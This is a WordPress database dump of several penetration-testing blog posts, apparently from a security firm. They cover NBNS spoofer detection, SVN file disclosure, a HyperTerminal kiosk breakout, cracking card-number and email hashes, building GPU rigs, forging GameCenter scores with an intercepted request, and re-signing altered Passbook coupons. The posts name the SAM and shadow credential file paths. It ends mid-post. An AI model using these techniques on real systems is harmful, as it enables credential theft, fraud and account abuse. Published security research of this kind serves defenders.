There is an additional option that I’m currently working on, to make your pen tester especially annoyed. The –R flag will set the SMB response option to try and authenticate with the spoofer’s system. Since the NBNS spoofing attacks are used to capture (or relay hashes), why not send the attacker some hashes. Why not send a ton of them and make the attacker take their time trying to crack them, or just overload their logs. This will probably annoy an attacker more than anything else, but anything to make their attack harder may give you extra time to respond.

On that note, it was a little difficult for me to write this tool, as I have a feeling it will come back to haunt me in a future pen test. Feel free to send me any comments or feedback on the script through this blog or through our github page.

Special thanks go out to our client who had the idea for this script.

[post_title] => Identifying Rogue NBNS Spoofers [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => identifying-rogue-nbns-spoofers [to_ping] => [pinged] => [post_modified] => 2021-05-03 20:18:24 [post_modified_gmt] => 2021-05-03 20:18:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1148 [menu_order] => 379 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) [43] => WP_Post Object ( [ID] => 1150 [post_author] => 10 [post_date] => 2013-08-20 07:00:41 [post_date_gmt] => 2013-08-20 07:00:41 [post_content] => Frequently during external and web application penetration tests, we run into SVN entries files on web servers. These files are sometimes created as part of the SVN commit process and can lead to the disclosure of files (and source-code) that has been added to the web directory. This can be especially impactful for assessments, where there may be vulnerable pages (and/or configuration files) that are not clearly advertised from the main web site (i.e.: admin_backdoor.jsp or web.config). The files are typically laid out in lists of files and directories followed by their type (dir, file) on the next line. registry dir admin_login.jsp file Additionally, there may be source files accessible through the svn-base files (i.e.: /.svn/text-base/ExamplePage.jsp.svn-base). You can consider these files like backups of the originals that (hopefully) won’t execute on the server. Sometimes, the server sees these files with their original extension (.jsp) and you may have trouble getting at the source. The entries files can typically be found in each directory that is used by SVN, as well as any subdirectories. So if a directory shows up in your entries list, it’s worth looking in that directory for another entries file. I got tired of manually going through each of these entries files, so I wrote a script to automate listing the files, source files, and directories into an HTML file. The script also goes into each identified directory to find more entries files to spider.

Script Usage:

SVNtoDIR   http://somewebsite.com/DIR/.svn/entries  SVNbaseDIR (optional)

Output:

The script will output a directory named after the directory that you’re starting in (i.e.: DIR), and in that directory will be an HTML file (DIR.html) that you can use to start navigating files. Links to the svn-base files are included on the page and show up with the .svn-base file extension. If you are familiar with the default Apache directory listing page, this should be pretty easy for you to navigate. I’ve also added sorting for the table, just click on Name or Type at the top. Additionally, I’ve added an option for a second parameter that you can use for outputting the .svn-base files to a directory. Be careful with this one, as you can potentially end up downloading the entire web root. The script is available out at the NetSPI GitHub - https://github.com/NetSPI/SVNentriesParser [post_title] => Parsing SVN Entries Files with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => parsing-svn-entries-files-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:52 [post_modified_gmt] => 2021-04-13 00:05:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1150 [menu_order] => 382 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [44] => WP_Post Object ( [ID] => 1152 [post_author] => 10 [post_date] => 2013-07-22 07:00:42 [post_date_gmt] => 2013-07-22 07:00:42 [post_content] => It’s not every day that we run into kiosks, terminals, etc. that have HyperTerminal as one of the available applications. This may be a corner case, but it’s another example to add to Scott’s blog about break out methods. In this example, we encountered a terminal setup, where the system was a fairly locked down Windows XP machine. HyperTerminal was one of the only applications in the start menu, and other functionality (shortcut keys, right-click, run) was not available. The method here is pretty simple, but now you can add HyperTerminal as another program to use for breaking out.

Steps to Exploit

First off, we want to open up HyperTerminal and create a new connection to write to. In this example, we’ll just use our non-connected COM1 port as a connection. This is pretty easy to set up, it’s more or less clicking next until you are dropped into the HyperTerminal window below.
Hyperterm
At this point, we will want to turn on the “Echo typed characters locally” setting, so we can see what we’re doing. This can be found under File -> Properties -> Settings Tab -> ASCII SetupHyperterm We will want to save the text that we’re typing to the HyperTerminal screen, so select Transfer, then Capture Text. Hyperterm Since the user we are using has rights to write to the startup folder, we are just going to save a batch file that will run at the user’s next logon (C:Documents and SettingsAll UsersStart MenuProgramsStartuptest.bat). You may not have rights to save there, but you might have access to save the file to another location that you could run the script from. Once the capture is started, type the command(s) that you want to run into the HyperTerminal window and stop the capture. Here we are just going to type cmd and stop, so that the script will pop up a cmd shell when we login. You have plenty of other possible programs that you could run here. Hyperterm We can see in the example screen that the test.bat file was saved to the startup folder and when the script is executed, a command shell pops up. Hyperterm

Conclusion

You may never have to use HyperTerminal to break out, but keep it in mind if you are locked out of other routes. For our sysadmin readers, don’t allow HyperTerminal on your terminals, kiosks, etc.
[post_title] => Quick! To the HyperTerminal [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => quick-to-the-hyperterminal [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:56 [post_modified_gmt] => 2021-06-08 21:47:56 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1152 [menu_order] => 384 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [45] => WP_Post Object ( [ID] => 1158 [post_author] => 10 [post_date] => 2013-06-13 07:00:07 [post_date_gmt] => 2013-06-13 07:00:07 [post_content] => As penetration testers, we are frequently engaged to do penetration tests for PCI compliance. As a part of these penetration tests, we look for cardholder data (Card Numbers, CVV, etc.) in files, network traffic, databases, and anywhere else we might be able to catch it. Often times, we will find hashes of credit card numbers along with the first six and/or last four numbers of the credit card number. Given that credit card numbers are a fixed length, this limits the keyspace that we need to use to brute force the hashes. The language in the PCI DSS is a little vague about how cardholder data needs to be hashed, but there is information in requirement 3.4 that helps. “Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches:
  • One-way hashes based on strong cryptography (hash must be of the entire PAN)
  • Truncation (hashing cannot be used to replace the truncated segment of PAN)
  • Index tokens and pads (pads must be securely stored)
  • Strong cryptography with associated key-management processes and procedure"
While this information is good, it does not ensure that the implementer of the hashing function is doing things correctly. “Strong cryptography” can be interpreted a number of different ways. One could argue that SHA256 is a strong hashing algorithm, therefore meeting the requirements. It does not take a significant amount of effort for us to try and brute force SHA256 hashes, so the strength of the algorithm is a moot point. This type of attack is actually called out as a footnote in the requirement. “Note: It is a relatively trivial effort for a malicious individual to reconstruct original PAN data if they have access to both the truncated and hashed version of a PAN. Where hashed and truncated versions of the same PAN are present in an entity‘s environment, additional controls should be in place to ensure that the hashed and truncated versions cannot be correlated to reconstruct the original PAN.” These “additional controls” could include salts for the hashes (frequently stored with the hash) or encrypting the truncated versions. There are a number of other potential controls that we could talk about, but that would be enough info for another post. Even with proper additional controls on the PAN data (truncated and hashed), the root of the issue is still the length of the card number and the limited keyspace that is needed for guessing the number. Given a (potentially) sixteen digit card number, the first six digits, and the last four digits, we are able to easily iterate through the  remaining six digits in a matter of minutes.  There are only a fixed number of IIN or BIN prefixes for cards (think the first 4-6 numbers of a card). These numbers are available online and pretty easy to find. Given a list of these numbers, we are able to reduce our cracking efforts for situations where hashes are only stored with the last four digits of the card number. Factoring in that credit card numbers are Luhn valid, this reduces the amount of effort that we have to go through to hash the credit card number guesses. Example Card Format: Cc For this example, we will use the TCF Debit Card BIN. With a million potential card numbers (000000 to 999999 for the middle digits) with a last four digits of 1234, there are 100,000 potential Luhn valid card numbers in this space. So as you can see in this case, the Luhn check cuts the cracking space down by ninety percent. As it turns out, this will be the case with any of the credit card numbers that you are brute forcing. Since the last (or check) digit can only be one of ten numbers (0-9), you are limiting the number of valid Luhn check numbers to one of the ten numbers. Simply put, this works because you are not brute forcing the check digit. Time wise, it takes about 30 minutes to get through this keyspace (for the example number above) on a 2.80 Ghz Intel Core i7 processor. I also ran this test with several other programs open, so your results may vary. In general practice, I’ve seen most hashes crack within two minutes.

Code

The code for cracking these hashes is actually quite simple. Read in the input file, iterate through the numbers that need guessing, and hash the Luhn valid numbers. If the guess hash matches your input hash, it will write out your results to your output file. There’s also a small block in here to read in a list of IIN/BINS to use when you need to do guessing on the first 4-6 card numbers. You will have to provide your own list of these. Below is some sample output with the full card numbers and hashes redacted. Each period represents a Luhn valid card number and is used to show the cracking status. Cc I’ve put the code out on the NetSPI GitHub for those who are interested: http://netspi.github.io/PS_CC_Checker/

Conclusion

The PCI DSS allows merchants to store partial card numbers, but not the full number. While the card number may not be stored in full, storing the hash of the card along with some of the digits allows an attacker to make educated guesses about the card number. This basically renders the hashing useless. While this is directly called out in requirement 3.4 of the DSS, we have found instances of hashes being stored with the truncated PAN data. Even without the truncated PAN data, the cracking effort for a card number hash is still reduced by the static IIN/BIN numbers associated with the card issuer. [post_title] => Cracking Credit Card Hashes with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-credit-card-hashes-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:32 [post_modified_gmt] => 2021-06-08 21:51:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1158 [menu_order] => 390 [post_type] => post [post_mime_type] => [comment_count] => 3 [filter] => raw ) [46] => WP_Post Object ( [ID] => 1160 [post_author] => 10 [post_date] => 2013-06-04 07:00:09 [post_date_gmt] => 2013-06-04 07:00:09 [post_content] => In the first blog of this series, we showed you how to set up the hardware for your own GPU cracking box. In the second blog of this series, we showed you how to set up the OS, drivers, and software for your own GPU cracking box. In this blog, we will simply go over common ways to get hashes along with methods and strategies for cracking the hashes. We will touch on most of these topics at a high level, and add links to help you get more information on each topic. Again, this is a pretty basic intro, but hopefully it will serve as a starter’s guide for those looking into password cracking.

Common Ways to Get Hashes

We could write an entire post on ways to capture these, but we will just touch on some high level common methods for getting the hashes.

LM/NTLM

One of the most common hashes that we crack are Windows LANMAN and/or NTLM hashes. For systems where you have file read rights on the SYSTEM and SAM files (local admin rights, web directory traversal, etc.), you will want to copy them off of the host for hash extraction. Windows XP/Vista/Server 2003 Paths:
  • C:WindowsSystem32configSAM
  • C:WindowsSystem32configSYSTEM
Windows 7 and Server 2008
  • C:WindowsSystem32configRegBackSAM
  • C:WindowsSystem32configRegBackSYSTEM
Once you have these files, there are a number of tools that you can use to extract the hashes. Personally, I just import the files into Cain and export the hashes. If you have a meterpreter session on the system and “nt-authoritysystem” rights on the host, you can easily run the smart_hashdump module to dump out the local password hashes. Dumping hashes on a Server 2008 domain controller can be a little trickier. Pauldotcom has a great writeup on the process. Additionally, you can get password hashes from the network with tools like responder and the smb_capture module in Metasploit. These can be captured in both LM and NTLM formats. The LM format can be cracked with a combination of rainbow tables and cracking. I’ve also automated that process with a script. The cracking of network NTLM hashes is now supported by OCLHashcat. Previously, Cain was the only tool (that I knew of) that could crack them, and Cain was doing CPU cracking, not GPU cracking.

Linux Hashes

Dumping hashes from Linux systems can be fairly straightforward for most systems. If you have root access on the host, you can use the unshadow tool to get the hashes out into a john compatible format. Often times you will have arbitrary file read access, where you will want to get the /etc/shadow and /etc/passwd files for offline cracking of the hashes.

Web App Hashes

Many web applications store their password hashes in their databases. So those hashes may end up getting compromised from SQL injection or other attacks. Web content management systems (wordpress, drupal, etc.), more specifically their plugins, are also common targets for SQL injection and other attacks that expose password hashes. These hashes can vary in format (MD5, SHA1, etc.) but most that I have seen are typically unsalted, making them easier to crack. While some web application hashes are salted, you may get lucky and find the salts in the database with the hashes. It’s not as common, but you may get lucky.

Cracking the Hashes

At this point we’re going to assume that you have taken the time to set up your hardware and software for cracking. If you want some tips, check out the links at the top of this post. For some of your cracking needs, you will want to start with a simple dictionary attack. This will quickly catch any of the simple or commonly used passwords in your hashes. Given a robust dictionary, a good rule set, and a solid cracking box, it can be pretty easy to crack a lot of passwords with little effort. Here’s some basic dictionaries to get you started:
  • Skull Security has a great list (including the Rockyou list) of dictionaries
  • Crackstation has a 15 GB dictionary available with pay what you want/can pricing
  • A uniqued copy of Wikipedia can make for an interesting dictionary
You will probably want to get some hashes for benchmarking your cards’ or CPU’s performance. There are tons of possible benchmarking hashes from the cracking requests sections on the InsidePro forums. Here you can frequently find large dumps of hashes from users requesting that someone crack their hashes for them. While the sources of these hashes are rarely disclosed, you could get a great sample of hashes to practice cracking. As for software, the three main pieces of cracking software that we use are Cain, John the Ripper, and OCLhashcat. I won’t include commands on how to run those, as those are very well documented other places.

Conclusion

Hopefully this blog has given you some tips on getting started on gathering and cracking hashes. If you have any questions on the hardware, software, or anything else, feel free to leave us a comment. [post_title] => GPU Cracking: Putting It All Together [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-putting-it-all-together [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:44 [post_modified_gmt] => 2021-04-13 00:05:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1160 [menu_order] => 392 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [47] => WP_Post Object ( [ID] => 1166 [post_author] => 10 [post_date] => 2013-04-07 07:00:20 [post_date_gmt] => 2013-04-07 07:00:20 [post_content] =>

Intro

This winter, we decided to create our own dedicated GPU cracking solution to use for our assessments. It was quite the process, but we now have a fully functional hash cracking machine that tears through NTLMs at roughly 25 billion hashes per second (See below). While attempting to build this, we learned a lot about pushing the limits of consumer-grade hardware. We've recently updated this blog with more recent info - https://blog.netspi.com/gpu-cracking-rebuilding-box/

Goals

We set out to build a cracking rig with four high end video cards (AMD Radeon HD 7950) to run oclHashcat. We also wanted this solution to be rack mountable, so that it would be easy to store in our data center. As it turns out, there are not a ton of video card friendly server cases. We were only able to find a few GPU cracking friendly cases, but most of them cost more than the rest of our cracking hardware combined. If you have the money to spend, we would recommend going with the special case to save yourself from other issues, but this isn’t really an option for everyone. The reason why we recommend this is that the cards themselves do not take well to being lined up all together on a standard ATX motherboard. The fans tend to stick out further than they should and end up hitting the next card in the row. On top of that, the cramped conditions lead to overheating cards and cracking jobs stopping. The specialized cases have enough space to avoid these issues, making it easier to set up a box. We opted for an “open air” configuration for our cracking box. This was primarily driven by trying to mimic the setups of bitcoin mining rigs that we had seen online. I will say that this is not the prettiest option for housing all of these cards. However, it is one of the most efficient ways to space the cards out for cooling. With the “open air” setup, we’re able to connect riser cables to two of the cards and keep the other two cards down on the board. These riser cables can have their own problems. We ended up opting for one (16x to 1x) riser cable and a different (16x to 16x) riser cable that has some modifications for voltage. The 16x to 16x cable has a 12 volt molex adapter soldered to the 12 volt pins on the riser slot. GPU Cracker Blog 1 While this looks a little hackish, it actually works quite well. We had to do this to supplement the voltage from the motherboard, as it was unable to pull proper voltage for all four cards (with two riser cables). I should also mention that there is some crafty engineering taking place to suspend the two cards above the board. This was accomplished with several zip ties and a modified piece of wire-mesh shelving. GPU Cracker Blog 1 B I should also note that this whole rig is tied down (with stand-offs) to an old rack mount shelf. All in all, this setup works quite well. We can have all four cards running at full speed and the the hottest card will top out at 85° Celsius. We’re very aware of the fact that this looks insane. It’s hopefully a temporary solution. Eventually, we’re looking at securing a single rail to the rack to screw the cards into. As for performance, here’s our current averages for hash cracking (OCL in Brute-Force mode): MD5 – ~16000.0M/s NTLM – ~25500.0 M/s SHA1 – ~7900.0M/s  GPU Cracker Blog 1 C

5 Tips for Building Your Own

So if you’re planning on putting together your own GPU cracking rig, here’s some steps that you may want to take to make it easier.
  1. Look into a nice GPU server case and motherboard combo like this one http://www.newegg.com/Product/Product.aspx?Item=N82E16816152125
    1. These will be spendy (~$3,500+ for the combo, cards not included) but they are meant for this kind of setup.
  2. Look at what the bitcoin miners are doing.
    1. Our “open-air” setup is actually pretty similar to most mining rigs that I can find.
    2. Replicate their parts list for your setup, if it works for them, it “should” work for you.
  3. Plan everything out as best you can.
    1. From components and case layout to power and cooling requirements.
    2. Measure twice and cut once to avoid returns, repairs, and rebuying parts.
  4. Devote a resource to the project
    1. Intern not busy enough? Have them build the cracking machine.
    2. Find the person that plays more PC games than you.
      1. They may know more about the cards and multi-GPU setups.
  5. Don’t get discouraged if your set up isn’t working.
    1. We didn’t get it right on the first try, but we eventually got there.
Check out GPU Cracking: Setting up the Server by Eric Gruber on how to configure your cracking box to see all of the cards and run the cracking software. [post_title] => GPU Cracking: Building the Box [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-building-the-box [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:44 [post_modified_gmt] => 2021-04-13 00:05:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1166 [menu_order] => 400 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [48] => WP_Post Object ( [ID] => 1170 [post_author] => 10 [post_date] => 2013-03-18 07:00:09 [post_date_gmt] => 2013-03-18 07:00:09 [post_content] => I recently wrote a blog post about cracking email hashes from the iOS GameCenter application. During my research on the issue, I noticed that there were a number of games where users had insanely high scores. Lots of the users also had the exact same score (9,223,372,036,844,775,807) for each of the games that they played. Coincidentally this number is the largest possible signed integer value that you can have. It turns out that getting these high scores isn't that hard to do.

Setup

In order to modify our scores, we will need to proxy our iOS traffic through Burp. In order to properly intercept the encrypted iOS traffic, you will also need to install the Portswigger certificate on your iOS device At this point, you will want your Burp listener to be on the same wireless network as your iOS device. You also need to have your Burp listener set to listen on all interfaces to allow your iOS device to proxy through it. The iOS proxy settings are fairly easy to set up. Just enter your Wi-Fi settings, tap on the blue and white arrow-in-a-circle (to the right of your SSID), and scroll down to your HTTP Proxy settings. Set the server IP to your Burp listener and set your port to the Burp listener port. Visit an https website on your iOS device to see if the Portswigger certificate is properly installed. If you don’t have any issues (or SSL warnings), you should be ready to go.

Modifying Scores

Once your iOS device is properly proxying traffic through your Burp listener, you will want to generate a score to post to GameCenter. For most games, this is not very hard to do. We will be using “Cut the Rope”as our example. Open up the first level, set Burp to intercept traffic, and complete the level (you cut one rope, it’s really easy). At this point you will see the “Level Complete” screen on your iOS device and the following request will come through Burp.
POST /WebObjects/GKGameStatsService.woa/wa/submitScores HTTP/1.1
Host: service.gc.apple.com
User-Agent: gamed/4.10.17.1.6.13.5.2.1 (iPhone4,1; 6.1.2; 10B146; GameKit-781.18)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Accept: */*
Some-Cookies: have been removed to make this shorter
Content-Type: application/x-apple-plist
Connection: keep-alive
Proxy-Connection: keep-alive
x-gk-bundle-version: 2.1
Content-Length: 473
x-gk-bundle-id: com.chillingo.cuttherope
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>scores</key>
    <array>
        <dict>
            <key>category</key>
            <string>1432673794</string>
            <key>context</key>
            <integer>0</integer>
            <key>score-value</key>
            <integer>12345</integer>
            <key>timestamp</key>
            <integer>1361998342937</integer>
        </dict>
    </array>
</dict>
</plist>
If you are seeing other requests come through, just forward them and keep your eye out for the request for the “submitScores” page. Before forwarding the score on to Apple, you will want to modify the score. The highest possible value that you can submit is 9,223,372,036,844,775,807. Replace the “score-value” stored in the tags (bolded in the example) with 9223372036844775807 and forward the request. You should receive a “status 0” response from Apple and your score will be updated in GameCenter.
Gc

Conclusion

I don’t intend on modifying my high scores for each of my GameCenter games. I really don’t care that much about the scores, but some people do. Given Apple’s current model for GameCenter leaderboards, this may not be an easy fix. At a minimum, Apple may want to do some checking on these high scores to weed out any of the users that are maxing out their top scores. For now, I’m going to put the iPhone down and get some work done.
[post_title] => Hacking High Scores in iOS GameCenter [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-high-scores-in-ios-gamecenter [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:30 [post_modified_gmt] => 2021-06-08 21:51:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1170 [menu_order] => 403 [post_type] => post [post_mime_type] => [comment_count] => 16 [filter] => raw ) [49] => WP_Post Object ( [ID] => 1174 [post_author] => 10 [post_date] => 2013-02-11 07:00:09 [post_date_gmt] => 2013-02-11 07:00:09 [post_content] =>

Lately I've been looking at iOS. After looking into the Passbook application, I started poking around with the iOS Game Center application. The iOS Game Center allows iOS users to connect with friends, play games, and compare scores for their games. Think of it as Xbox Live for iOS.

Each Game Center user has an alias (or nickname, handle, etc.), a first and last name, and an email address tied to their account (also tied to your Apple ID). A user’s alias is publicly accessible by all Game Center users. The user’s first and last names are provided if they are shown in the “Friend Recommendations” feature or if they share a mutual friend with another user. If an email address is tied to an account, a SHA1 hash of the email address might also be accessible. Sometimes there’s more than one email address tied to an account, so multiple hashes will be returned when the account information is queried. Finally, each user has a playerID in the format of G:145811274 (my ID). This is the unique identifier used by Game Center to identify an account. I was only able to see this identifier while intercepting traffic.

For this attack, I proxied all of my traffic through the Burp Suite proxy. This allowed me to easily capture (and replay) all of the requests that Game Center was making to Apple servers. I did have to install the Portswigger CA certificate on my iPhone to intercept the SSL traffic. The prime targets for data enumeration were the “Friend Recommendations” and the friends of my friends list.

Since I wasn't really using Game Center, I had to add some friends. I started by gathering all of the playerIDs for everyone in my recommended friends. This list appeared to be populated by recommendations based off of the people that I follow on Twitter and my Facebook friends. I also pulled down the top 150 users from the leader boards to add to my list as well. I intercepted an add request with Burp, moved the request into the intruder function and used my list of playerIDs (~250 IDs total) to automate the friend request process. After adding several friends (~20) I requested that Game Center send me a list of all of the friends of my friends. I then added them to the list of people to friend request.  I should also note that requesting over 500 people as friends will probably result in your iPhone/iPad/etc. exploding in notifications of friend approvals.

I should note here that it would be very easy to set up a script to run once a day, to pull down a list of friends of friends and automatically friend request everyone that is one hop away from me. 

Gc

Leader board listings

Gc

Listing of Friend Recommendations and the "Friends of a Friend" list

Attack

If you haven’t figured it out yet, the inference attack that I will demonstrate has to do with guessing the email address from the SHA1 hash. Since we already have an alias or handle for the user, along with the person’s first and last name, it’s not a long stretch for us to try and guess the email address(es) tied to their iTunes account. After enumerating all of the information available for my recommended friends and next-hop friends (friends of my friends), I wrote a quick PowerShell script to read the data and generate potential email addresses.

Considering most people (that I know) use some variation of their name, or a handle for their email address it was pretty easy to generate variations to use for guessing. In order to test multiple email domains, I appended each variation with hundreds of popular email address domains. Below is a sample of the potential email user names that I tested:

  • kfosaaen@example.com 
  • k.fosaaen@example.com 
  • karlfosaaen@example.com 
  • karl.fosaaen@example.com 
  • karl.f@example.com
  • karlf@example.com 

After generating the potential emails, I then created SHA1 hashes of these email addresses and compared them to the hashes in the collected data. The script I used is really simple and may not have any practical use for you, but I put it out on GitHub: https://github.com/kfosaaen/EmailGenerator

After I wrote the PowerShell script, I realized that I could just use HashCat to do the generation (and some brute forcing) for me. I just used the generated emails as my dictionary and some custom rules to help with the address guessing.

Results

By the end of my data collection, I had attempted to add over five-hundred people as friends on Game Center. If you happened to be one of those people, I’m sorry. Overall, I was able to add 174 new friends to my Game Center account. Thanks to those friends, I was able to collect 1,635 records of Game Center ID, Alias, Email Hash, and Full Names. I actually stopped collecting records after I hit 45 friends, but I’m sure that I could get many more at this point. Those records also had to be paired down to remove special characters in user names, so the final list came out to 1,534 records. Of those, I was able to crack three hundred (19.5%) of the email addresses in about seven minutes.

This was all done over the course of about four days. Given more time and a better script for generating potential email addresses, I think that the percentage would be a lot higher for the collected email addresses. I did stop the attack at the point where I felt that I had a good proof-of-concept, as I really didn't care to harvest a ton of emails. I have been in contact with Apple about this since January 10th, so they've had a fair amount of time to deal with the issue on their end.

Conclusion

I know this isn't a ground breaking attack that exposes tons of sensitive user data, but it’s important to note that if a piece of data is important enough to hash, it should be hashed well. It should also not be available to all users. From an attacker’s perspective, having this information would be very valuable to anyone trying to attack a specific iTunes account. If you’re a Game Center user, you can protect your info by turning off the “Public Profile” feature in the Game Center settings.

In order to fix the issue, Apple should consider the business need for returning SHA1 hashes of user email addresses. I don’t know what the hashes are currently being used for on the iPhone side, but there may be a need for them. If they are needed, then Apple should be salting these hashes to reduce the risk of an attacker cracking them.

[post_title] => Know Your Opponent – an Inference Attack Against iOS Game Center [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => know-your-opponent-an-inference-attack-against-ios-game-center [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:27 [post_modified_gmt] => 2021-06-08 21:51:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1174 [menu_order] => 407 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [50] => WP_Post Object ( [ID] => 1180 [post_author] => 10 [post_date] => 2012-12-12 07:00:09 [post_date_gmt] => 2012-12-12 07:00:09 [post_content] => With the release of iOS 6, Apple introduced the Passbook application. Currently there are sixteen different applications that support Passbook integration. The purpose of the Passbook application is to provide a one-stop application to manage all of your coupons, loyalty/gift cards, and tickets/boarding passes. This all sounds great, but what happens when an attacker abuses this service to get discounts or to access other peoples’ gift cards. This blog will show you how easy it is to intercept Passbook passes, modify them, and redeploy them to the Passbook application. The Passbook passes are typically generated by applications at the user’s request. The user tells the application that they want their coupon/ticket/etc. in their Passbook and the application calls out to its Passbook server. At this point, the Passbook server generates the pass and sends it back to the app to pass on to the user.

How can we break it?

Now there are already multiple services available that will generate Passbook passes for you. I’m not going to cover those here, as they have their own ways of creating passes and that’s not what we’re looking to do. In this blog, you’ll see how you can intercept a Passbook .pkpass file from the source and modify it for your own uses.

How to intercept the pass

The easiest way to intercept the Passbook URLs and/or files is by using a proxy. I have Burp Proxy set up on a laptop to intercept web traffic from my iPhone. Once you identify the Passbook request URLs (assuming the application uses HTTP for requests), you can easily replay the request (in a browser) from the intercepting host to get the .pkpass file. Additionally, you could sniff out wireless traffic from your wireless network and identify Passbook requests.

Deconstructing the .pkpass

Plain and simple, .pkpass files are zip files. All you have to do to access the internal files is unzip the file. Once unzipped, the three required files contained in the .pkpass folder are:
  • manifest.json (generated by Apple’s signpass tool)
  • pass.json (contains the Passbook pass data)
  • signature (a signature file for integrity
Additional image files may be in the folder to be used by the pass (icon.png, thumbnail.png, strip.png), but those are all considered optional. If you are looking at an intercepted pass file, you will most likely find additional images used for the pass. The most interesting file is the pass.json file. A sample of the pass.json:
{ "passTypeIdentifier":"pass.com.ACME. MobileCoupon", "formatVersion":1, "organizationName":"ACME Corporation", "serialNumber":"ABCDX-12345", "teamIdentifier":"A9BKD012", "logoText": "", "description":"ACME coupons.", "webServiceURL":"https://PASSBOOKServer.com/passbook/", "authenticationToken":"123456789123456789123456789", "suppressStripShine" : 1, ], "locations":[ {"latitude" : 44.989893, "longitude" : -93.279087} ]
Here are the important parts that you need to modify, if you’re going to regenerate your own pass.
  • passTypeIdentifier -This will later be changed to your Identifier (see below)
  • teamIdentifier - This will also get changed to yours (also see below)
  • webServiceURL - You may just want to remove this one (otherwise the pass may phone home for updates)
  • authenticationToken - You may also want to delete this as well (it’s not going to get used by anything)

How to create your own passes with signpass

At this point, I’m going to assume that you’re using a Mac to generate your passes. You can do this from Windows, but it’s a little more complicated (and a possible future blog post). Get yourself an iOS developer account with Apple. It’s $99 and you actually get some interesting stuff with it (assuming you’re into iOS). Once you have an account, you need to create a “New Pass Type ID” from the iOS Provisioning Portal. This pass type ID will be used by the pass.json file as the passTypeIdentifier and the teamIdentifier. You can follow the steps on Apple’s site to create the ID. Open the “configure” action on the Pass Type ID page and download the pass certificate. Once you download your certificate, install it to your OSX keychain and you should be good to sign your own passes. Passbook The Apple developers site has the Passbook SDK available that contains the signpass application for generating .pkpass files. The SDK actually provides several example passes that you can generate on your own for testing. In order to generate the actual .pkpass files, you will need to compile the signpass application in Xcode (the project is in the SDK files). This can be a pain if you’re not familiar with Xcode. Basically, you build the application in Xcode, click on “Products” (on the left), right click on signpass, and click “Show in Finder.” This will bring you to the compiled application, where you can copy it out to your Passbook directory. Once you’ve compiled the signpass application, you can use it to generate the manifest.json and signature files. The application will also zip all the files into the .pkpass file. You can use your intercepted file that you unzipped earlier, but you will want to delete the signature and manifest.json files before you try and recreate the .pkpass file. You will also want to modify the pass.json parameters (passTypeIdentifier and teamIdentifier) to match the certificate you just downloaded from Apple. Finally, since you’re working on a Mac, you need to delete any .DS_Store files that get created in your .pkpass folder. If there is a .DS_Store file in the folder and it isn’t caught by the manifest.json file, your pass will not be valid on the phone. Here’s an example of the .pkpass creation:
{ NetSPIs-MacBook-Pro:netspi NetSPI$ ./signpass -p NetSPI.raw/  2012-11-12 15:00:04.512 signpass[945:707] {  "icon.png" = 575b58cc687b853935c63e800a63547a9c54572f;  "icon@2x.png" = dbfca47b69c6f0c7fc452b327615bc98d7732d33;  "logo.png" = d360269292d8cfe37f5566bba6fb643d012bef84;  "logo@2x.png" = cdd3c98dd3044fe3d82bcea0cca944242cdcc6bf;  "pass.json" = f72d3d597c7fc9d1f2132364609d32c9890de458;  "strip.png" = b9f823da6eefc83127b68f0ccca552514803ed1f;  "strip@2x.png" = 319991c69de365c0d2a8534e0997aea01f08d3eb;  "thumbnail.png" = a68cc65e48febb6e603682d057d4e997da64a6a5;  "thumbnail@2x.png" = 7ec0e3c38225fea3a5b0dbb36d7712c27b8b418f; }

Sending passes via email or web

The easiest way to deploy your newly created pass is through email. A properly signed .pkpass file should show up in your iOS mailbox as a Passbook pass without any issue. Additionally, .pkpass files can be downloaded from a web server that has support for serving .pkpass files.

Passbook

Conclusions

